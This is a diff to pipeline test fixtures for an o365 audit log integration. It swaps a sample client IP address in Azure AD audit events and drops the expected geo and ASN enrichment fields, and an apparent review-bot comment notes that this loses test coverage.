@@ -25618,7 +25618,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"
UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to 
user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"t
argetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"
Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -25648,9 +25648,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json index d5d4fd60bc0..5a574c2ea18 100644 
--- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json
@@ -2,25 +2,7 @@
 "expected": [
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -34,7 +16,7 @@
 "ObjectId": "Not Available",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -148,7 +130,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
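Review bot: The new expected output in the `@@ -2,25 +2,7 @@` hunk drops `source.geo` and `source.as` entirely rather than carrying the enrichment values for the new address, so after this change the pipeline test no longer verifies that the geoip/ASN processors populate `source` from the client IP; the `-` lines remove the whole `geo` and `as` objects and the `+` side keeps only `"ip": "67.43.156.15"`. Presumably the test stack's GeoIP database returns no record for 67.43.156.15, but the commit does not say so, and a regression that silently stops enriching `source.ip` would now pass this test. If 67.43.156.15 is meant to be in the supported test range, the expected `geo`/`as` block for it should be kept so the enrichment step remains covered; otherwise a short note in the package changelog that geoip assertions were intentionally dropped from the fixtures would help the next reviewer. The `@@ -34,7 +16,7 @@` and `@@ -148,7 +130,7 @@` hunks on this line are plain IP substitutions and need nothing further.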
@@ -160,12 +142,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036007400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n 
\\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124815300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\
"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": 
\\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated 